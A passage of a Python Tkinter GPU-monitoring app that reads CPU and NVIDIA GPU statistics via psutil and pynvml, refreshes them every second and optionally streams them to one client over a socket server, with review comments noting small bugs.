            self.name_frame.rowconfigure(0, weight=1)
            self.name_frame.columnconfigure(0, weight=1)
            self.name_frame.grid(row=0, column=0, sticky=N+S+E+W)
            # Label containing the GPU name
            self.name_label = tk.Label(master=self.name_frame, text=self.get_gpu_name(), width=25, bg='black',
                                       fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
            self.name_label.grid(row=0, column=0, sticky=W+E)
            # ___________________________________________
            # Frame containing the Labels for the remaining GPU information
            # _____________________________________________________________
            self.info_frame = tk.Frame(master=self, bg='black', relief='sunken', borderwidth=3)
            self.info_frame.rowconfigure(1, weight=1)
            self.info_frame.columnconfigure(0, weight=1)
            self.info_frame.rowconfigure(5, weight=1)
            self.info_frame.columnconfigure(1, weight=1)
            self.info_frame.grid(row=1, column=0, sticky=N+S+E+W)
            # configure the info Labels
            self.cpu_util_label1 = tk.Label(master=self.info_frame, text="CPU Utilization:", width=25, bg='black',
                                            fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
            self.cpu_util_label2 = tk.Label(master=self.info_frame, text="", width=25,
                                            bg='black', fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
            self.gpu_util_label1 = tk.Label(master=self.info_frame, text="GPU Utilization:", width=25, bg='black',
                                            fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
            self.gpu_util_label2 = tk.Label(master=self.info_frame, text="", width=25,
                                            bg='black', fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
            self.gpu_temp_label1 = tk.Label(master=self.info_frame, text="GPU Temperature:", width=25, bg='black',
                                            fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
            # NOTE(review): get_gpu_temps() returns a list, so this initial text
            # renders as e.g. "[41]°C"; update_label_text() later fixes it by
            # formatting element [0].
            self.gpu_temp_label2 = tk.Label(master=self.info_frame, text="{}\N{DEGREE SIGN}C"
                                            .format(self.get_gpu_temps()), width=25, bg='black', fg='white',
                                            relief='sunken', borderwidth=2, anchor=CENTER)
            self.gpu_clock_label1 = tk.Label(master=self.info_frame, text="GPU Clock Speed:", width=25, bg='black',
                                             fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
            self.gpu_clock_label2 = tk.Label(master=self.info_frame, text="", width=25,
                                             bg='black', fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
            self.mem_clock_label1 = tk.Label(master=self.info_frame, text="Memory Clock Speed:", width=25, bg='black',
                                             fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
            self.mem_clock_label2 = tk.Label(master=self.info_frame, text="", width=25,
                                             bg='black', fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
            self.gpu_fan_speed_label1 = tk.Label(master=self.info_frame, text="GPU Fan Speed:", width=25, bg='black',
                                                 fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
            self.gpu_fan_speed_label2 = tk.Label(master=self.info_frame, text="", width=25, bg='black', fg='white',
                                                 relief='sunken', borderwidth=2, anchor=CENTER)
            self.gpu_power_label1 = tk.Label(master=self.info_frame, text="GPU Power:", width=25, bg='black',
                                             fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
            self.gpu_power_label2 = tk.Label(master=self.info_frame, text="", width=25,
                                             bg='black', fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
            # place the appropriate labels in column 0 of the info_frame
            self.cpu_util_label1.grid(row=1, column=0, sticky=W+E)
            self.gpu_util_label1.grid(row=2, column=0, sticky=W+E)
            self.gpu_temp_label1.grid(row=3, column=0, sticky=W+E)
            self.gpu_clock_label1.grid(row=4, column=0, sticky=W+E)
            self.mem_clock_label1.grid(row=5, column=0, sticky=W+E)
            self.gpu_fan_speed_label1.grid(row=6, column=0, sticky=W+E)
            self.gpu_power_label1.grid(row=7, column=0, sticky=W+E)
            # _____________________________________________________________
            # calls the function update_label_text() to get the info for the labels in column 1, change the text of the
            # appropriate label and places the labels in column 1 of info_frame
            # Note: A separate function was needed here in order to regularly update the information every 1 second
            # with .after()
            self.update_label_text()

        def settings_menu(self):
            """Open a small always-on-top Settings window, centered over the
            main window, to capture the server IP address."""
            self.settings_window = Toplevel()
            self.settings_window.title('Settings')
            self.settings_window.resizable(False, False)
            self.settings_window.attributes("-topmost", 1)
            settings_w = 240
            settings_h = 50
            # Center the settings window over the current main-window geometry.
            wlx = self.winfo_x()
            wly = self.winfo_y()
            ww = self.winfo_width()
            wh = self.winfo_height()
            x = (wlx) + ((ww/2)-(settings_w/2))
            y = (wly) + ((wh/2)-(settings_h/2))
            self.settings_window.geometry("%dx%d+%d+%d" % (settings_w, settings_h, x, y))
            self.settings_window.configure(bg='black')
            self.settings_window.columnconfigure(0, weight=1)
            self.settings_window.rowconfigure(0, weight=0)
            self.ipconfiglabel = Label(master=self.settings_window, text="Server ip: ", width=10, bg='black',
                                       fg='white', borderwidth=2, anchor=CENTER)
            self.servconfig = Entry(master=self.settings_window, insertbackground='white', width=25, bg='black',
                                    fg='white', relief='sunken', borderwidth=2)
            self.servconfig.focus_set()
            self.done_button = Button(master=self.settings_window, text='Done', command=self.get_serv_config)
            self.ipconfiglabel.grid(row=0, column=0, sticky=W + E)
            self.servconfig.grid(row=0, column=1, sticky=W + E)
            self.done_button.grid(row=1, column=1)

        def get_serv_config(self):
            """Store the entered server IP in self.servip and close Settings."""
            self.servip = self.servconfig.get()
            self.settings_window.destroy()

        # Gets the current gpu values every second and updates the appropriate label text
        # if allowSending is true then the data is sent using send_data()
        def update_label_text(self):
            """Refresh every value label; reschedules itself via after(1000)."""
            new_text = []
            # Identify each value label by comparing against the frame's children.
            for i in self.info_frame.children.values():
                if i == self.cpu_util_label2:
                    new_text.insert(0, psutil.cpu_percent())
                    self.cpu_util_label2.configure(text="{} %".format(new_text[0]))
                    self.cpu_util_label2.grid(row=1, column=1, sticky=W+E)
                    if self.allowSending:
                        # Prepend the metric tag so the client can dispatch on it.
                        new_text.insert(0, "cpu_util")
                        self.send_data(new_text)
                elif i == self.gpu_util_label2:
                    new_text = self.get_gpu_utilization_rates()
                    self.gpu_util_label2.configure(text=new_text[0])
                    self.gpu_util_label2.grid(row=2, column=1, sticky=W+E)
                    if self.allowSending:
                        # Flatten the NVML utilization struct into [tag, gpu, memory].
                        util_data = []
                        util_data.insert(0, new_text[0].memory)
                        util_data.insert(0, new_text[0].gpu)
                        util_data.insert(0, "gpu_util")
                        self.send_data(util_data)
                elif i == self.gpu_temp_label2:
                    new_text = self.get_gpu_temps()
                    self.gpu_temp_label2.configure(text="{}\N{DEGREE SIGN}C".format(new_text[0]))
                    self.gpu_temp_label2.grid(row=3, column=1, sticky=W+E)
                    if self.allowSending:
                        new_text.insert(0, "gpu_temp")
                        self.send_data(new_text)
                elif i == self.gpu_clock_label2:
                    new_text = self.get_gpu_clock_speed()
                    self.gpu_clock_label2.configure(text="{} Mhz".format(new_text[0]))
                    self.gpu_clock_label2.grid(row=4, column=1, sticky=W+E)
                    if self.allowSending:
                        new_text.insert(0, "gpu_clock")
                        self.send_data(new_text)
                elif i == self.mem_clock_label2:
                    new_text = self.get_mem_clock_speed()
                    self.mem_clock_label2.configure(text="{} Mhz".format(new_text[0]))
                    self.mem_clock_label2.grid(row=5, column=1, sticky=W+E)
                    if self.allowSending:
                        new_text.insert(0, "mem_clock")
                        self.send_data(new_text)
                elif i == self.gpu_fan_speed_label2:
                    new_text = self.get_gpu_fan_speed()
                    self.gpu_fan_speed_label2.configure(text="{} %".format(new_text[0]))
                    self.gpu_fan_speed_label2.grid(row=6, column=1, sticky=W+E)
                    if self.allowSending:
                        new_text.insert(0, "gpu_fan")
                        self.send_data(new_text)
                elif i == self.gpu_power_label2:
                    new_text = self.get_gpu_power_usage()
                    self.gpu_power_label2.configure(text="{} Watts".format(new_text[0]))
                    self.gpu_power_label2.grid(row=7, column=1, sticky=W+E)
                    if self.allowSending:
                        new_text.insert(0, "gpu_power")
                        self.send_data(new_text)
            # Re-run this method in one second.
            self.after(1000, self.update_label_text)

        # Uses the handle to get the gpu name and return it
        def get_gpu_name(self):
            """Return the GPU name reported by NVML for the module-level handle."""
            self.gpu_name = []
            self.name = pynvml.nvmlDeviceGetName(_handle)
            self.gpu_name.append(self.name)
            return self.gpu_name[0]

        # Gets and returns the utilization rates of the GPU and video memory
        def get_gpu_utilization_rates(self):
            """Return a 1-element list holding the NVML utilization struct."""
            self.util_rates = []
            self.util = pynvml.nvmlDeviceGetUtilizationRates(_handle)
            self.util_rates.append(self.util)
            return self.util_rates

        # Gets and returns the GPU temperature in degrees celsius
        def get_gpu_temps(self):
            """Return a 1-element list holding the GPU temperature."""
            self.gpu_temps = []
            self.temps = pynvml.nvmlDeviceGetTemperature(_handle, 0)
            self.gpu_temps.append(self.temps)
            return self.gpu_temps

        # Gets and returns the GPU clock speed in Mhz
        def get_gpu_clock_speed(self):
            """Return a 1-element list holding the graphics clock (clock type 0)."""
            self.gpu_clock_speed = []
            self.gpu_clock = pynvml.nvmlDeviceGetClockInfo(_handle, 0)
            self.gpu_clock_speed.append(self.gpu_clock)
            return self.gpu_clock_speed

        # Gets and returns the memory clock speed in Mhz
        def get_mem_clock_speed(self):
            """Return a 1-element list holding the memory clock (clock type 2)."""
            self.gpu_mem_clock = []
            self.mem_clock = pynvml.nvmlDeviceGetClockInfo(_handle, 2)
            self.gpu_mem_clock.append(self.mem_clock)
            return self.gpu_mem_clock

        # Gets and returns the fan speed as a percentage
        def get_gpu_fan_speed(self):
            """Return a 1-element list holding the fan speed percentage."""
            self.gpu_fan_speed = []
            self.fan_speed = pynvml.nvmlDeviceGetFanSpeed(_handle)
            self.gpu_fan_speed.append(self.fan_speed)
            return self.gpu_fan_speed

        # Gets and returns the GPU current power usage in watts
        def get_gpu_power_usage(self):
            """Return a 1-element list holding the power draw rounded to watts."""
            self.gpu_power_usage = []
            self.power = pynvml.nvmlDeviceGetPowerUsage(_handle)  # nvml value is returned as milliwatts
            self.power = round(self.power/1000)  # convert from milliwatts to watts and round
            self.gpu_power_usage.append(self.power)
            return self.gpu_power_usage

        # Executes when the server thread is started via the file menu "Start Server" choice
        def start_server(self):
            """Bind on port 25250, accept one client, and enable data sending."""
            # NOTE(review): self.servip is only assigned in get_serv_config(), so
            # starting the server before visiting Settings raises AttributeError;
            # bind()/listen() also sit outside the try, so bind errors are uncaught.
            self.sock.bind((self.servip, 25250))
            self.sock.listen(1)
            try:
                print("Server Started.")
                # Blocks until a client connects, or raises OSError when the
                # socket is closed by exit().
                self.connection, self.client_ip = self.sock.accept()
                self.allowSending = True
                self.prep_gpu_name()
            except OSError:
                pass

        # Gets the gpu name ready to be sent to the client
        def prep_gpu_name(self):
            """Send the GPU name (decoded from NVML bytes) as the first message."""
            device_name = []
            device_name.append(str(self.get_gpu_name(), 'utf-8'))
            device_name.insert(0, "gpu_name")
            self.send_data(device_name)

        # Handles sending the data and any exceptions which may occur
        def send_data(self, new_text):
            """Length-prefix `new_text` and push it to the connected client.

            The payload is encoded once to measure its length, then the length
            is prepended to the list and the whole thing re-encoded; the loop
            retries until every byte of the final encoding is sent.
            """
            data = []
            total_sent = 0
            data = bytearray((str(new_text)), 'utf-8')
            msg_len = len(data)  # length of the un-prefixed payload
            new_text.insert(0, msg_len)
            data = bytearray((str(new_text)), 'utf-8')
            while total_sent < len(data) and self.allowSending:
                try:
                    # send() may transmit only part of the buffer; advance by
                    # the number of bytes actually sent.
                    sent = self.connection.send(data[total_sent:])
                    total_sent += sent
                except ConnectionResetError:
                    messagebox.showerror("Connection Error", "Connection error. Connection was lost.")
                    self.allowSending = False
                except ConnectionAbortedError:
                    messagebox.showerror("Connection Error", "Connection error. Connection was lost.")
                    self.allowSending = False
            return None

        # Closes the socket, joins the thread (if possible), and quits the program
        def stop_server(self):  # Disabled for now
            """Shut the socket down and exit (currently not wired to any menu)."""
            self.allowSending = False
            self.disconnect = True
            self.sock.shutdown(socket.SHUT_RDWR)
            self.exit()

        # File menu exit choice
        def exit(self):
            """Close the socket, join the server thread if running, and quit."""
            self.sock.close()
            if not self.disconnect:
                self.allowSending = False
                if self.server_thread.is_alive():
                    # Closing the socket above unblocks accept(), letting the
                    # server thread finish so this join can return.
                    self.server_thread.join()
                self.quit()
            else:
                self.disconnect = False
    gpu_mon_py = App()  # Create the App()
    gpu_mon_py.config(menu=gpu_mon_py.menubar)  # Configure the menu
    gpu_mon_py.mainloop()  # Start the App's mainloop (blocks until quit)
    gpu_mon_py.exit()  # release the socket/thread after the mainloop returns
    pynvml.nvmlShutdown()  # Shutdown pynvml
    return None
# Script entry point: call main() only when run directly, not on import.
if __name__ == "__main__":
    main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.